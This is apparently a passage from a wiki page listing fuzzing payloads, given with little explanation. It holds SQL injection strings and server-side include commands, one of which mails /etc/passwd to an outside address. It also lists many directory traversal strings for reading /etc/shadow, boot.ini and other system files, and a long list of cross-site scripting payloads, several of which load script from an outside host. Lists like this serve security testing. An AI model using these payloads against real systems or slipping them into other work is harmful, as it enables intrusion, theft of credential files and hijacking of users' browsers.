)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: 30 July 2007 - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Some server side include statements&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Discovery Statements ===&lt;br /&gt;
&lt;br /&gt;
Discovery Statements&lt;br /&gt;
&amp;lt;pre&amp;gt;# Discovery Statements (July 2007)&lt;br /&gt;
# Statements used to cause exploitable errors&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Common exploit code  &lt;br /&gt;
&amp;lt;pre&amp;gt;# Best Statements (July 2007)&lt;br /&gt;
# Statements covering 90% of all vulnerabilities &lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
Full List - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;# Full List (July 2007)&lt;br /&gt;
# All Statements - Full List &lt;br /&gt;
# Based on the XSS cheat sheet &lt;br /&gt;
# http://ha.ckers.org/xss.html&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
